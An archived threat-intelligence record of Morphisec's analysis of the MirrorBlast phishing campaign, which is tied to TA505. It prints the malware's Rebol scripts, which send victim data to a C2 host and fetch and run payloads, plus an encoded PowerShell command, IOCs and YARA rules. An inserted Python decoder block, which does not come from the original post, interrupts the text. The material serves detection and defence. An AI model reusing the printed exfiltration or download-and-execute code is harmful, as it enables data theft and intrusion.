{
	"id": "55c3edce-00f1-4901-b44f-85161bebf09b",
	"created_at": "2026-04-06T00:09:25.253852Z",
	"updated_at": "2026-04-10T03:36:36.759574Z",
	"deleted_at": null,
	"sha1_hash": "db18e461db9845d1b954bc2d5c67d4d55821fc17",
	"title": "Explosive New MirrorBlast Campaign Targets Financial Companies",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1727941,
	"plain_text": "Explosive New MirrorBlast Campaign Targets Financial Companies\r\nBy Morphisec\r\nArchived: 2026-04-05 12:43:26 UTC\r\nOverview\r\nMorphisec Labs tracked a new MirrorBlast campaign targeting financial services organizations\r\nMirrorBlast is delivered via a phishing email that contains malicious links which download a weaponized Excel\r\ndocument\r\nMirrorBlast has low detections on VirusTotal due to the extremely lightweight macro embedded in its Excel files,\r\nmaking it particularly dangerous for organizations that depend on detection-based security and sandboxing\r\nIntroduction\r\nFinancial organizations are historically among the most targeted by threat actors. There are many reasons for this, not least\r\nof which is the trove of customer data the financial sector holds, as well as the funds to pay large sums of money to regain\r\naccess to encrypted data.\r\nThe Morphisec Labs team has tracked a new version of a campaign targeting financial organizations. Dubbed “MirrorBlast”\r\nby ET Labs, the current attack campaign the Labs team has tracked began in early September. There was similar activity in\r\nApril 2021 as well, but the current campaign began more recently.\r\nThe attack chain of the infection bears a similarity to the tactics, techniques, and procedures commonly used by the\r\nallegedly Russia-based threat group TA505. 
The similarities extend to the attack chain, the GetandGo functionality, the final\r\npayload, and the domain name pattern.\r\nTA505 has been active since at least 2014 and, as far as analysts can ascertain, is financially motivated.\r\nAs a group, TA505 is best known for frequently changing the malware it uses as well as driving global trends in malware\r\ndistribution.\r\nIn this blog post, we will examine the new MirrorBlast phishing campaign, from the initial delivery of a malicious Excel file\r\nto the end result of loading an additional payload.\r\nFigure 1: The attack chain of MirrorBlast\r\nTechnical Details\r\nIn September we observed a malspam campaign delivering Excel documents as an attachment. This campaign targets\r\nmultiple sectors in Canada, the United States, Hong Kong, Europe, and more.\r\nThe attack chain starts with an email attachment document, but at a later stage it changes to use a Google feedproxy URL\r\nwith a SharePoint or OneDrive lure that poses as a file share request. These URLs lead to a compromised SharePoint or a\r\nfake OneDrive site that the attackers use to evade detection; in the SharePoint case a sign-in requirement additionally helps to\r\nevade sandboxes, which cannot complete the login to reach the document.\r\nhttps://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies\r\nPage 1 of 9\n\nFigure 2: A phishing email with the SharePoint lure theme.\r\nFigure 3: A fake OneDrive website serving an Excel document (in German).\r\nExcel Document\r\nThe Excel document is weaponized with extremely lightweight macro code.\r\nFigure 4: A totally FUD (fully undetectable, i.e. zero detections at the time) Excel document.\r\nThe macro code can be executed only on a 32-bit version of Office, because the ScriptControl ActiveX object it relies on ships only as a 32-bit control and cannot be instantiated by 64-bit Office\r\n(ActiveX control compatibility). 
The macro code performs anti-sandboxing by checking whether the following conditions hold:\r\nThe computer name is equal to the user domain (this is what a machine that is not joined to a domain reports, which is typical of analysis VMs).\r\nThe username is equal to admin or administrator.\r\nWe have observed different variants of the document. The first variants had no anti-sandboxing, and the macro\r\ncode was hidden in the Language and Code document information properties; later variants moved it to the sheet cells.\r\nAdditionally, one more obfuscation layer was added on top of the previous obfuscation.\r\nFigure 5: An Excel document with lightweight macro and anti-sandboxing.\r\nThe command executes JScript through the AddCode method of the ScriptControl ActiveX object (ScriptControl\r\nMethods). Although the official documentation presents AddCode as merely adding code to the control, it loads and evaluates the code much as Run or Evaluate execute a statement, so top-level statements run as soon as the code is added.\r\nThe macro executes the following JScript:\r\nFigure 6: An obfuscated JScript command.\r\nThe evaluated, deobfuscated command is:\r\nFigure 7: The evaluated JScript.\r\nThis spawns the msiexec.exe process, which downloads and installs an MSI package. Using msiexec is also a known\r\nway to break the attack chain sequence and complicate attack trajectory visibility (msiexec LOLBin). The msiexec.exe\r\nprocess that performs the install does not execute as a direct child process of Excel.exe (the installation is carried out under the Windows Installer service, so the process tree does not lead back to Excel); this, together with UILevel set to 2 (INSTALLUILEVEL_NONE, a completely\r\nsilent installation), helps with sandbox evasion.\r\nMSI Package\r\nWe have observed two variants of the MSI installer: KiXtart and REBOL. Both variants are generated using the Windows\r\nInstaller XML Toolset (WiX) version 3.11.0.1528; once executed they drop two files into a random directory in\r\nProgramData. 
One of them is the legitimate language interpreter executable (KiXtart or REBOL) and the other is\r\nthe malicious script.\r\nFigure 8: Rebol/KiXtart dropped in the ProgramData folder.\r\nSome of the MSI packages included autorun persistence through `Software\\Microsoft\\Windows\\CurrentVersion\\Run`.\r\nFigure 9: MSI package registry properties.\r\nREBOL Variant\r\nRebol is a cross-platform data exchange language and a multi-paradigm dynamic programming language\r\n(http://www.rebol.com/). The first-stage Rebol script is base64 encoded; `debase` (base64 by default) decodes it and `do` evaluates the result:\r\nrebol[] do to-string debase\r\n\"YXR0ZW1wdFsKCWNhbGwge2VjaG8gJVVTRVJET01BSU4lXCVVU0VSTkFNRSUgPiBuYW1lICYmIGZvciAvZiAidG9rZW5zPTQtNSBkZWxpb\r\ndeducted\"\r\nCode Block 1: The first-stage Rebol script.\r\nThe visible prefix of the base64 decodes to `attempt[ call {echo %USERDOMAIN%\\%USERNAME% \u003e name \u0026\u0026 for /f \"tokens=4-5 deli`, i.e. the same echo of the victim’s domain and user name that Code Block 2 shows in clear, wrapped in attempt[...].\r\nNext, it exfiltrates targeted information by sending a GET request whose parameter is the base64-encoded user domain,\r\nusername, OS version and architecture, along with a Rebol script build number (build=1.0.0). Older script versions don’t\r\ncontain the build number. The C2 sends back a UUID that will be associated with the victim machine and will be used in\r\nfuture communications.\r\ncall \"echo %USERDOMAIN%\\%USERNAME% \u003e name \u0026\u0026 VER \u003e os \u0026\u0026 echo %PROCESSOR_ARCHITECTURE% \u003e arch\"\r\nwait 5\r\nreg: enbase join \"name=\" [trim/all read %name \"\u0026os=\" trim/all read %os \"\u0026arch=\" trim/all read %arch\r\n\"\u0026build=1.0.0\"] either exists? %uuid [uuid: read %uuid] [\r\nuuid: read join http://menorukis[.]su/p/r?x= reg\r\nuuid: parse uuid \"|\"\r\nuuid: uuid/2\r\nwrite %uuid uuid\r\n]\r\nCode Block 2: The Rebol script sends the victim’s data to the C2.\r\nThe script then enters an infinite polling loop in which it sends the base64-encoded UUID to the C2 and waits for the response\r\n“3”. 
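Worked example (added here; this is not code from the Morphisec post): the registration request of Code Block 2 and the polling loop of Code Block 3 both carry their data as a plain base64 string in the x= query parameter, so C2 traffic in a proxy log can be decoded offline. The Python below rebuilds the beacon from constructed victim values, decodes it back the way an analyst would from a captured URL, extracts the UUID from a constructed reply of the form ok|<uuid>, builds the three poll URLs, and decodes the truncated -enc PowerShell argument printed in Code Block 3 (base64 of UTF-16LE text, so the lone trailing base64 character has to be dropped before decoding). The victim values, the reply body and the UUID are invented for the example; the endpoint paths /p/r, /p/m, /p/p and /p/d, the name/os/arch/build field layout, the split on | and the build=1.0.0 marker are taken from the script on this page.

```python
import base64
from urllib.parse import urlsplit, unquote

C2_HOST = 'menorukis.su'  # C2 domain from the page, undefanged so urlsplit can parse it


def trim_all(text):
    # Rebol trim/all removes every whitespace character, including the
    # spaces inside the output of VER.
    return ''.join(text.split())


def build_beacon(name, os_ver, arch, build='1.0.0'):
    # Mirrors: reg: enbase join 'name=' [... '&os=' ... '&arch=' ... '&build=1.0.0']
    # followed by: read join http://menorukis.su/p/r?x= reg
    plain = ('name=' + trim_all(name) + '&os=' + trim_all(os_ver)
             + '&arch=' + trim_all(arch) + '&build=' + build)
    return 'http://' + C2_HOST + '/p/r?x=' + base64.b64encode(plain.encode()).decode()


def build_poll(uuid):
    # Loop stage: p: enbase join 'uuid=' uuid ; the same p is sent to /p/m, /p/p and /p/d
    p = base64.b64encode(('uuid=' + uuid).encode()).decode()
    return ['http://' + C2_HOST + '/p/' + ep + '?x=' + p for ep in ('m', 'p', 'd')]


def _b64_decode_lenient(blob):
    # Accept blobs with missing padding and blobs cut mid-character: a length
    # of 4n+1 cannot carry a whole byte, so the lone trailing character is dropped.
    blob = ''.join(blob.split())
    rem = len(blob) % 4
    if rem == 1:
        blob = blob[:-1]
    elif rem:
        blob += '=' * (4 - rem)
    return base64.b64decode(blob)


def decode_beacon_url(url):
    # Analyst side: from a captured request URL recover the endpoint and the fields.
    parts = urlsplit(url)
    x = ''
    for pair in parts.query.split('&'):
        key, _, value = pair.partition('=')
        if key == 'x':
            x = unquote(value)  # not unquote_plus: a '+' here is base64 data, not a space
    plain = _b64_decode_lenient(x).decode('utf-8', 'replace')
    fields = {}
    for pair in plain.split('&'):
        key, _, value = pair.partition('=')
        fields[key] = value
    return {'endpoint': parts.path, 'fields': fields}


def parse_registration_reply(body):
    # uuid: parse uuid '|'  then  uuid: uuid/2  -> the second |-separated element
    return body.split('|')[1]


def payload_requested(poll_body):
    # if a == '3' [ ... ] : only the /p/p reply is checked, and only for the value 3
    return poll_body.strip() == '3'


def decode_ps_enc(blob):
    # powershell.exe -enc takes base64 of UTF-16LE text
    return _b64_decode_lenient(blob).decode('utf-16-le', 'ignore')


# Constructed sample data (not from the page). The echo in the script prints
# USERDOMAIN, a backslash (chr(92)) and USERNAME.
SAMPLE_NAME = 'CORP' + chr(92) + 'jdoe'
SAMPLE_OS = 'Microsoft Windows [Version 10.0.19042.1288]'  # typical VER output
SAMPLE_ARCH = 'AMD64'
SAMPLE_REPLY = 'ok|2f6b1d2e-0c4a-4c7e-9f0e-6b1b8d3c1a55'  # constructed reply to /p/r
# Truncated -enc argument exactly as printed in Code Block 3 on this page
PS_ENC = ('JAB1AHUAaQBkACAAPQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwA'
          'TABvAGMAYQBsAFwARwBvAG8AZwBsAGUAXAB1AHUAa')


def demo():
    url = build_beacon(SAMPLE_NAME, SAMPLE_OS, SAMPLE_ARCH)
    uuid = parse_registration_reply(SAMPLE_REPLY)
    polls = build_poll(uuid)
    return {
        'register': decode_beacon_url(url),
        'uuid': uuid,
        'poll_uuid': decode_beacon_url(polls[1])['fields']['uuid'],
        'run_payload': payload_requested('3'),
        'ps_command': decode_ps_enc(PS_ENC),
    }


if __name__ == '__main__':
    for key, value in demo().items():
        print(key, value)
```

Because the parameter is plain base64 rather than encrypted, a proxy or IDS rule can decode x= on requests to /p/r and match on the build= marker; the same decoder applied to the /p/p request body returned by the server tells you whether the victim was told to fetch the next stage.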
Once it receives the appropriate response, it executes a PowerShell command that downloads an archive file and\r\nextracts its content to a folder named archive. In that folder is the next stage of the Rebol script, which is then executed.\r\nwhile[true][\r\np: enbase join \"uuid=\" uuid\r\nread join http://menorukis[.]su/p/m?x= p\r\na: read join http://menorukis[.]su/p/p?x= p\r\nl: read join http://menorukis[.]su/p/d?x= p\r\nif a == \"3\" [\r\ncall \"powershell.exe -exec bypass -enc\r\nJAB1AHUAaQBkACAAPQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwATABvAGMAYQBsAFwARwBvAG8AZwBsAGUAXAB1AHUAa\r\nwait 5\r\ndo load %archive/payload.rb\r\nread join http://menorukis[.]su/p/p?x= enbase join \"uuid=\" [uuid \"\u0026status=true\"] ] wait 3]\r\nCode Block 3: The loop waiting for the payload from the C2. The -enc argument is truncated above; it is base64 of UTF-16LE text and decodes to the beginning of `$uuid = Get-Content \"C:\\ProgramData\\Local\\Google\\uu`.\r\nFigure 10: The executed PowerShell commands.\r\nWe have also observed a newer version of the Rebol script (build=1.0.2) that omits the PowerShell execution part. Instead, it\r\nimplements the same logic in Rebol code; this is done to decrease noise and script size (no PowerShell process\r\nexecution as part of the attack chain). At the time of writing, we couldn’t retrieve the next-stage Rebol script (payload.rb).\r\nKiXtart Variant\r\nKiXtart is a free-format scripting language with rich built-in functionality for easy scripting (http://www.kixtart.org/).\r\nThe dropped script is encrypted or, in the documentation’s terms, tokenized. The KiXtart documentation describes it\r\nas\r\n“In practical terms this means that tokenized scripts are perfectly safe from attempts at viewing or changing them\r\nby regular end users. 
However, tokenized scripts are not safe from attacks by people with enough time and\r\ndetermination on their side.” (KiXtart, Pre-tokenizing scripts).\r\nQuickly searching for `Decrypt` in the strings leads to the subroutine where the decryption happens.\r\nFigure 11: KiXtart executable – decryption function.\r\nDumping the strings from memory after they were decrypted resulted in the following:\r\nFigure 12: Strings from the dumped memory.\r\nLooking at the strings along with the .pcap file we captured, we see that the script sends the victim’s machine information\r\n(domain, computer name, user name, process list) to the C2. The C2 responds with a number that indicates how to\r\nproceed, as with the Rebol variant.\r\nAttribution to TA505\r\nBelow are the TTPs that allow us to attribute the attack chain to TA505 with confidence:\r\nThe infection chain consists of Email -\u003e XLS -\u003e MSI (Rebol/KiXtart loader). The MSI component closely\r\nresembles the Get2 (GetandGo) loader from TA505.\r\nUse of a SharePoint/OneDrive lure theme.\r\nUse of cdn*dl*fileshare, *onedrive* or *dropbox* as part of the domain name.\r\nOne of the SharePoint-themed lure emails leads to the following page:\r\nFigure 13: Page with mismatched MD5 in the details pane.\r\nWe noticed that the MD5 in the details pane doesn’t match the MD5 of the Excel document. In fact, this MD5\r\nbelongs to a legitimate PuTTY SFTP client. This specific hash was mentioned in a related TA505 intrusion.\r\nAccording to @ffforward, the next-stage Rebol script leads to the FlawedGrace RAT that is associated with TA505\r\n(malpedia-flawedgrace).\r\nConclusion\r\nTA505 is one of many financially motivated threat groups currently active. They are also one of the most\r\ncreative, as they tend to constantly shift the attacks they leverage to achieve their goals. 
This new cyberattack for\r\nMirrorBlast is no exception for TA505 or for other innovative threat groups.\r\nIf anything, the shift in the attack chain is a further indication that organizations can ill afford to take a defensive, reactive\r\napproach to their security. They must remain constantly vigilant, iterating on security procedures to ensure they are not\r\ncaught off-guard when new TTPs are deployed to breach their defenses.\r\nThe ability of the MirrorBlast attack to have very low detections in VirusTotal is also indicative of the focus most groups\r\nhave on evading detection-centric solutions. Yet again, it is clear that the market’s reliance on detection and response leaves\r\nthem open to more attacks than it resolves. A new way forward is needed.\r\nMorphisec Labs continues to track this campaign, and will provide updates as necessary.\r\nIOCs\r\nXLS\r\n55a06694bb96ecc422a7a6c731053b1ef5a35b5f5bac78752ca60b729cf7441f\r\n9f79b9b0811b43a8bfff663083e3a380981db8cd8a4de7f5c8e073ebd6b412f7\r\nde7fbe79942b20286d1676981f301472e02cabacc539ae944a7ef9f0977cb869\r\n86ea7a3f1a8418c27a6ccab58b933c6ecc595dd271db81819defb0f49d452c6d\r\n1eeb11946bb96ec1b749e246e4e56d2952264cffc370fc660c554de7cbd18ad4\r\nb593add117782fee1816d31afd95355533f926653b140291445543d9e3aca246\r\n867ae77ee54f412f8e56f2d3af5599d46d681d20171ae46c8166c5fec572a873\r\n2c2dda4f1a8810d8a774f0fb5e0e33b6ed4a3172601f457f37b5e4eacc6c4c27\r\n62cc2dd469713bf00f702c6c3b2e0bff92c21cbeadedcd09e9dde735c83d2712\r\n0a27471acc8ef0f3d6ee98b56b1030e5a83896e08a69a4574693d6c811307beb\r\n0cddfcb860d368413412df6905dd7962241675d7b1984f913d44a707cc04f689\r\n1c3b8a671c18cf25c71b21ad47f827c3037291f122bbcb148fae416973b636f1\r\n49ba406f19c2b1b689827a63517fa76b8e4f1346c4ff93c6a74c5ee8cba45367\r\n862e11e9d7f9c9ab27a4a30fa06fcefd292600d0d0a490aabd374db12bd8ded3\r\n442201667c85427b0a03437ff651b5eea280a21836de4a9e23bbd85c69c8208f\r\n28221d5ed7a6b37a4a0e5be77a9137378b1b6ca850c6327b77eae7a2b4437c96\r\nd508ebf55bb751e5c06c87f33c4ba75e
d8efe05595011f47c51429e2ce041880\r\nf2c90ffe3562335fab9532003e43d4911b8e42f34e3d693ba82703311dc133d2\r\n4648edc370e61a52c95d3f525391e0154406fd661d01d091f2d9dba9f8a485f2\r\n7073c55a5532d90c738993c14b6f983d1fb75030799e40249086f739c07c4ddc\r\nc6c6311c315503b53f8b5beb79eb568b243e7b07e66917635e4a2ebfdef0b0fa\r\n58a2ed404491f9cf523598cad8e8c2b87dba0f58e6b7894c8a5c2a46482fdf55\r\na66ae3be95b3e28757d0ec25b68f968459490a38d62bc3c935778b534f177c08\r\nb4de229237c0e0b540f97a6c43afe759e2bc4d2685c29fae1a63769ab58c3e0a\r\ne834acc3615f1b6ed00396d3db1e86770486f48433948a2a323b4f7bd99d9d19\r\nfbf46626fcb130611b5e9d96c6c9a5f523c322cd0affa83a91c4d37b3efb2c93\r\nd3a65f05ca4f72acf2cf07f56e37529e17cce6123463fb830c81106fa0c537c3\r\n8d16d408b915d28bf68b22ec96d2f900a45524d6843f68c52acc2e31aecd12ed\r\n3d24db72c1fb0913c9b74c1d69ad79aa95c287d970963c32ae10d93e6eb5386e\r\nd18c8bb2c9c59297c28f29db347238db4efd33d04f7a2af63ef26b8e8b9d0d79\r\nf4891094d6623dadbf84486b85a29b4bd0badf28ee100bc0e44c550715614e62\r\nc1ff2b5a636658e8f15b9dc9aef5d345477548b19f3f7fe232da8d8817138f00\r\nd6c487b1fb3d31851921b343f3d131f7cb4c0469a60484037a6fa8cfbdc29dea\r\nd236965a9ea87cfd7feaf67d1cbba45b8c24860c647ea51f34390cd89a5bde52\r\n79ba3338e507701af421d546b810012b8acded9bbb1552fadd86e34a4b2e00b1\r\n32b186a85062af8676bfe13a67577e6103acb0b00932c022fb5bb3c65a5840d3\r\n5ade4bd97c596505ef0219639aaa8141a3ff34ba212cdf510e0a121a0296f758\r\n948cf7061381fed4847b37f8bc8983d7a909e354e10096c040781ef0e0e89bb4\r\n7fc2fed914bdc1d7f49bd36d6196fffe818156bd05f48c73ad68021f7723cd4b\r\n1fd41236332fa7ce30f1fded2ffab486ae713519af7ca0ef23a7077c6e09d973\r\nf66f9f0e293e622b046ab473cf99d071a377418fd69bf1685c8d23c371f517cc\r\nc256a67fcfcd31269a91a49bf89919bf909b3056a0e8260b6e5dd89564412e18\r\n7904e73defa12c220cdc04d059cfc8acf3ae96dad41c7bb26381f076f17004cf\r\n9eaa499aa4a1bc644d2a9696f87a2e75c50c64da1ad52837db4e15659b7fd17f\r\n5457145d1709f6828a743ebe4ab34c74345647d7caca86d715db1cb52a7c596e\r\n8b6a7dee378118541acdd60aa5bef687ce1470f62403c6429045dc17b494349b\r\ncc5645a8109d03c1b02033b878144ae5ea39896ceaa3051136c1c740559b86fc\r\nfd4cd957f43c27084662d08031a049603f205dfc321d7fb858e9332c6c90a1ec\r\nMSI packages\r\n9d102de45f1e8adebe2e9dd46712c4058be383499a6c340d65cc7d91a7c27c74\r\n3a5cbaccae5178b29fdd57b0bff51574be1714d3f1ff0e528f5753af5ba9893a\r\n8c2b6cc4d672ade525421168d296ff5e2f367daf0e92311fdb8af6dc09006297\r\nb15f7056d2618cead5ca4e0eb6e414501bc295d95f34b84c6cf943e5c55c319d\r\na403eae5b12b909f4075e855f58d1742308d5e0d3450e79b60162fa9fb7caad7\r\na69d27abd043cc676095f71300bf6b2368167536fcd4fe5342cf79a7e94fc2fe\r\nc0114535dad04e955db6b9e51588eb6942b9b092b0250f97bcd58c53ed48d384\r\n808bbadea24f83013464dbf445a6c4b3050a7a5da03c16e04c8bd9e57198b1a5\r\ned7709cbbad9e164a45235be5270d6fb3492010ea945728a7d58f65f63434e58\r\n2b108ec3e467ab6c3a9ad6a5545e8410e4185f8fee7a008d3d3a89a8caf86e75\r\n0e6451e1f0eadb89390f4360e2a49a2ffb66e92e8b3ae75400095e75f4dd6abb\r\ne87595fde2ead6bf842d86b3170c09d4c7b462ca23afcd3484b9bafb46c35338\r\nd31cbaf03ae0d94f64de0d3108d3f957d81a7245b84e35aaef9c3c166be20bf6\r\nef55cb6228a33131152f7bf90bb23597b7ed7ba6a81f90fa283673e5f6a374f8\r\n6841b26b9218688de6318b083cb70ecdca65876455a1723be00b383844c71f42\r\n1bbbdcff7723fda499b8b7bffcdb510d56d10224bdb3293ae3d24debb9962aaa\r\n83e4c90dc8bc1c53a4000bef83a355c4e36d2a1ba4a5d0982bc5b9b350278f1f\r\n1d591def05a84554b94d042458f9d57ffb6ef7cebc3b6a8e164ec801f5e55642\r\na2fe17e940e8dbc5ed9e5c7c43d53ed75e0c37fca340bef648581c332309e8c1\r\n61f1b9c62af8cabeb930ac0046adf6844be88896bfb3a5bd659a0d061c559791\r\neceb164a69e8f79bb08099fcdf2b75071c527b0107daebc0e7a88e246b4c7f13\r\nC2\r\n172.105.178[.]119\r\n139.59.93[.]223\r\n207.246.101[.]153\r\nmenorukis[.]su\r\n155.138.205[.]35\r\n45.79.239[.]23\r\n95.216.138[.]82\r\n194.180.174[.]6\r\n185.202.93[.]201\r\n185.10.68[.]235\r\n185.183.96[.]147\r\n185.225.19[.]246\r\n185.176.220[.]198\r\n5.189.222[.]161\r\n46.161.40[.]172\r\nferistoaul[.]com\r\n23.19.58[.]52\r\nfidufagios[.]com\r\nYARA Rules\r\nrule MirrorBlast\r\n{\r\nmeta:\r\ndescription = \"Detects MirrorBlast Excel documents\"\r\nauthor = \"Morphisec labs\"\r\nstrings:\r\n$header = { D0 CF 11 E0 A1 B1 1A E1 } // OLE2 compound file header (legacy .xls)\r\n$jscript_str_1 = \").reverse().join(''))\"\r\n$jscript_str_2 = \"eval('\"\r\n$jscript_str_3 = \".split('\"\r\ncondition:\r\n$header at 0 and all of ($jscript_str_*)\r\n}\r\nrule MirrorBlast_msi\r\n{\r\nmeta:\r\ndescription = \"Detects MirrorBlast MSI package\"\r\nauthor = \"Morphisec labs\"\r\nstrings:\r\n$wix_installer = \"Windows Installer XML Toolset (3.11.0.1528)\"\r\n$kixtart_variant = \"WKIX32\"\r\n$rebol_variant = \"Google\"\r\ncondition:\r\n$wix_installer and 1 of ($kixtart_variant, $rebol_variant)\r\n}\r\nFile names\r\nC:\\ProgramData\\Local\\Google\\rebol-view-278-3-1.exe\r\nC:\\ProgramData\\Local\\Google\\exemple.rb\r\nC:\\ProgramData\\temp\\AudioDriver.exe\r\nC:\\ProgramData\\temp\\image.ico\r\nC:\\ProgramData\\Excel\\svchost.exe\r\nC:\\ProgramData\\Excel\\svchost.bin\r\nC:\\ProgramData\\01\\arab.exe\r\nC:\\ProgramData\\01\\arab.bin\r\nAbout the author\r\nMorphisec\r\nSource: https://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies"
	],
	"report_names": [
		"explosive-new-mirrorblast-campaign-targets-financial-companies"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59",
			"created_at": "2024-06-19T02:03:08.128175Z",
			"updated_at": "2026-04-10T02:00:03.636663Z",
			"deleted_at": null,
			"main_name": "GOLD TAHOE",
			"aliases": [
				"Cl0P Group Identity",
				"FIN11 ",
				"GRACEFUL SPIDER ",
				"SectorJ04 ",
				"Spandex Tempest ",
				"TA505 "
			],
			"source_name": "Secureworks:GOLD TAHOE",
			"tools": [
				"Clop",
				"Cobalt Strike",
				"FlawedAmmy",
				"Get2",
				"GraceWire",
				"Malichus",
				"SDBbot",
				"ServHelper",
				"TrueBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4",
			"created_at": "2022-10-25T15:50:23.5188Z",
			"updated_at": "2026-04-10T02:00:05.26565Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"TA505",
				"Hive0065",
				"Spandex Tempest",
				"CHIMBORAZO"
			],
			"source_name": "MITRE:TA505",
			"tools": [
				"AdFind",
				"Azorult",
				"FlawedAmmyy",
				"Mimikatz",
				"Dridex",
				"TrickBot",
				"Get2",
				"FlawedGrace",
				"Cobalt Strike",
				"ServHelper",
				"Amadey",
				"SDBbot",
				"PowerSploit"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3",
			"created_at": "2023-01-06T13:46:38.860754Z",
			"updated_at": "2026-04-10T02:00:03.125179Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"SectorJ04",
				"SectorJ04 Group",
				"ATK103",
				"GRACEFUL SPIDER",
				"GOLD TAHOE",
				"Dudear",
				"G0092",
				"Hive0065",
				"CHIMBORAZO",
				"Spandex Tempest"
			],
			"source_name": "MISPGALAXY:TA505",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e447d393-c259-46e2-9932-19be2ba67149",
			"created_at": "2022-10-25T16:07:24.28282Z",
			"updated_at": "2026-04-10T02:00:04.921616Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"ATK 103",
				"Chimborazo",
				"G0092",
				"Gold Evergreen",
				"Gold Tahoe",
				"Graceful Spider",
				"Hive0065",
				"Operation Tovar",
				"Operation Trident Breach",
				"SectorJ04",
				"Spandex Tempest",
				"TA505",
				"TEMP.Warlock"
			],
			"source_name": "ETDA:TA505",
			"tools": [
				"Amadey",
				"AmmyyRAT",
				"AndroMut",
				"Azer",
				"Bart",
				"Bugat v5",
				"CryptFile2",
				"CryptoLocker",
				"CryptoMix",
				"CryptoShield",
				"Dridex",
				"Dudear",
				"EmailStealer",
				"FRIENDSPEAK",
				"Fake Globe",
				"Fareit",
				"FlawedAmmyy",
				"FlawedGrace",
				"FlowerPippi",
				"GOZ",
				"GameOver Zeus",
				"GazGolder",
				"Gelup",
				"Get2",
				"GetandGo",
				"GlobeImposter",
				"Gorhax",
				"GraceWire",
				"Gussdoor",
				"Jaff",
				"Kasidet",
				"Kegotip",
				"Kneber",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Locky",
				"MINEBRIDGE",
				"MINEBRIDGE RAT",
				"MirrorBlast",
				"Neutrino Bot",
				"Neutrino Exploit Kit",
				"P2P Zeus",
				"Peer-to-Peer Zeus",
				"Philadelphia",
				"Philadephia Ransom",
				"Pony Loader",
				"Rakhni",
				"ReflectiveGnome",
				"Remote Manipulator System",
				"RockLoader",
				"RuRAT",
				"SDBbot",
				"ServHelper",
				"Shifu",
				"Siplog",
				"TeslaGun",
				"TiniMet",
				"TinyMet",
				"Trojan.Zbot",
				"Wsnpoem",
				"Zbot",
				"Zeta",
				"ZeuS",
				"Zeus"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434165,
	"ts_updated_at": 1775792196,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/db18e461db9845d1b954bc2d5c67d4d55821fc17.pdf",
		"text": "https://archive.orkl.eu/db18e461db9845d1b954bc2d5c67d4d55821fc17.txt",
		"img": "https://archive.orkl.eu/db18e461db9845d1b954bc2d5c67d4d55821fc17.jpg"
	}
}